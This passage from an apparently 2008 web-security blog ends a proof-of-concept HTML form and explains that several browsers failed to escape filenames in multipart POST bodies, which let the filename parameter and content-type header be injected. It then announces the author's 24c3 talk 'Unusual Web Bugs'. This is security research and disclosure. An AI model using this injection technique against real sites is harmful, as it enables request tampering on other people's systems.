<input type="submit" value='Send "File"' />
</form>
It relies on a bug in Firefox/IE/Safari where the filenames are not escaped before being put into the POST body to set the filename parameter and content-type header.
Note: http://kuza55.awardspace.com/files.php is probably vulnerable to a tonne of things; I'm not too worried as it's on free hosting.
Saturday, January 19, 2008
24c3 Presentation and Research
I did a presentation entitled Unusual Web Bugs at 24c3 a few weeks ago, for which you can find slides and video for on the first link.
However, since some of the things I presented were some of my own research which I haven't posted anywhere, I'll write a couple of posts about that in the next couple of days. There isn't too much though, so there's no need to get your hopes up, and if you've seen the video, you already know it.
[EDIT]P.S. Any comments or criticisms about the presentation would be greatly appreciated[/EDIT]
However, since some of the things I presented were some of my own research which I haven't posted anywhere, I'll write a couple of posts about that in the next couple of days. There isn't too much though, so there's no need to get your hopes up, and if you've seen the video, you already know it.
[EDIT]P.S. Any comments or criticisms about the presentation would be greatly appreciated[/EDIT]
Labels:
Conferences,
General Security,
Security (All),
Web App Sec
Subscribe to:
Posts (Atom)